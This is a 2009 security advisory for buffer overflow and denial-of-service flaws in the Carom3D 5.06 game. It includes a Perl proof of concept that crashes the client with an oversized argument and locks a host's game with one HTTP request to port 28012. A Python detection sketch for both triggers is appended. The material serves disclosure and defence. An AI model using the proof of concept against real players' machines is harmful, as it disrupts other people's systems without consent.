CVSS2
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL
AV:N/AC:M/Au:S/C:N/I:N/A:P
AI Score
Confidence: High
EPSS
Percentile: 89.5%
Title: Carom3D 5.06 Unicode Buffer Overrun/DoS Vulnerability
Advisory ID: ZSL-2009-4916
Type: Local/Remote
Impact: System Access, DoS
Risk: (2/5)
Release Date: 16.06.2009
Carom 3D is an online multi-user billiard game created with special 3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8 ball and other Billiard games to life.
The world-famous Korean game Carom3D suffers from a buffer overflow and a denial-of-service vulnerability. The BoF is triggered at runtime when 218 or more bytes are appended as an argument; ~1000 bytes overwrite the SEH. The denial of service is triggered when a user creates a LAN Game (credentials needed), creates a room and waits for other players to join the game. While the game is waiting (listening on TCP port 28012), an attacker can, with a simple HTTP GET/POST, lock down the GUI of the user who created the room, not allowing them to start or even exit the game's GUI unless it is force-quit (X).
Vendor: Neoact Co. Ltd. - <http://www.carom3d.com>
Affected Version: 5.06
Tested On: Microsoft Windows XP Professional SP3 (English)
N/A
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://www.milw0rm.com/exploits/8971>
[2] <http://packetstormsecurity.org/filedesc/carom3d-dos.txt.html>
[3] <http://securityreason.com/exploitalert/6430>
[4] <http://sebug.net/exploit/11631/>
[5] <https://vulners.com/cve/CVE-2009-2173>
[6] <http://xforce.iss.net/xforce/xfdb/51219>
[7] <http://securityreason.com/securityalert/5950>
[16.06.2009] - Initial release
[25.06.2009] - Added reference [7]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
#!/usr/bin/perl
#
# Title: Carom3D 5.06 Unicode Buffer Overrun/Denial Of Service Vulnerability
#
#
# Summary: Carom 3D is an online multi-user billiard game created with special
# 3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8
# ball and other Billiard games to life.
#
# Product Web Page: http://www.carom3d.com/
#
# Description: The world-famous Korean game Carom3D suffers from a buffer overflow
# and a denial-of-service vulnerability. The BoF is triggered at
# runtime when 218 or more bytes are appended as an argument. ~1000
# bytes overwrite the SEH. The denial of service is triggered when a
# user creates a LAN Game (credentials needed), creates a room and
# waits for other players to join the game. While waiting (listening
# on port 28012), with a simple HTTP GET/POST, an attacker can lock
# down the GUI of the user who created the room, not allowing them to
# start or even exit the game's GUI, unless it is force-quit (X).
#
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 15.06.2009
#
use strict;
use warnings;
# ----------------------------------DoS---------------------------------- #
use LWP::Simple;
# Host running Carom3D with a LAN room open (lab address).
my $url = 'http://192.168.1.3:28012';
# A single HTTP GET to the game port is enough to trigger the lockdown.
my $lockdown = get $url;
die "Couldn't get $url" unless defined $lockdown;
# You can Ctrl+C, the lockdown is ON.
# ---------------------------------/DoS---------------------------------- #
###########################################################################
# ----------------------------------BoF---------------------------------- #
# Added 217 bytes as argument = runs normally.
# Added 218 bytes as argument triggers the MS VC++ Runtime Library
# 'Buffer Overrun' error msg box informing us that the program's
# internal state is corrupted.
# 'A' x 218 builds the 218-byte argument described above.
system('C:\\Progra~1\\Neoact\\Carom3D\\carom.exe ' . ('A' x 218));
# ---------------------------------/BoF---------------------------------- #
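
A triage sketch for the two triggers the advisory describes, added here as an example and not part of the original advisory or the vendor's code: it flags `carom.exe` process starts whose argument reaches the 218-byte boundary and HTTP request lines arriving on TCP port 28012. The event layout, field names and sample records are assumptions constructed for illustration, and the method list goes slightly beyond the GET/POST named in the advisory.

```python
import ntpath
import re

GAME_PORT = 28012   # TCP port the advisory says a hosted LAN room listens on
ARG_LIMIT = 218     # argument length at which the advisory reports the overrun
HTTP_LINE = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS) \S+ HTTP/1\.[01]\r?\n")
CMDLINE = re.compile(r'^\s*(?:"([^"]+)"|(\S+))\s*(.*)$', re.S)

def oversized_carom_args(cmdline):
    """Return the argument length if carom.exe got >= ARG_LIMIT bytes, else 0."""
    m = CMDLINE.match(cmdline)
    if not m:
        return 0
    exe = ntpath.basename(m.group(1) or m.group(2)).lower()
    args = m.group(3).encode("utf-8", "replace")
    return len(args) if exe == "carom.exe" and len(args) >= ARG_LIMIT else 0

def http_on_game_port(dport, payload):
    """True when a session to the game port opens with an HTTP request line."""
    return dport == GAME_PORT and HTTP_LINE.match(payload) is not None

def triage(events):
    """Return (index, finding) for every event matching either trigger."""
    findings = []
    for i, ev in enumerate(events):
        if ev["kind"] == "process":
            n = oversized_carom_args(ev["cmdline"])
            if n:
                findings.append((i, f"carom.exe started with {n}-byte argument"))
        elif ev["kind"] == "tcp" and http_on_game_port(ev["dport"], ev["payload"]):
            findings.append((i, f"HTTP request from {ev['src']} on game port {GAME_PORT}"))
    return findings

# Constructed sample events (hypothetical layout; the binary payload is a
# placeholder, not the real game protocol).
SAMPLE = [
    {"kind": "process", "cmdline": r"C:\Progra~1\Neoact\Carom3D\carom.exe " + "A" * 217},
    {"kind": "process", "cmdline": r'"C:\Program Files\Neoact\Carom3D\carom.exe" ' + "A" * 218},
    {"kind": "tcp", "src": "192.0.2.10", "dport": 28012, "payload": b"GET / HTTP/1.1\r\nHost: x\r\n\r\n"},
    {"kind": "tcp", "src": "192.0.2.11", "dport": 28012, "payload": b"\x01\x00\x10\x00join"},
    {"kind": "tcp", "src": "192.0.2.12", "dport": 80, "payload": b"GET / HTTP/1.1\r\n\r\n"},
]

if __name__ == "__main__":
    for idx, why in triage(SAMPLE):
        print(idx, why)
```
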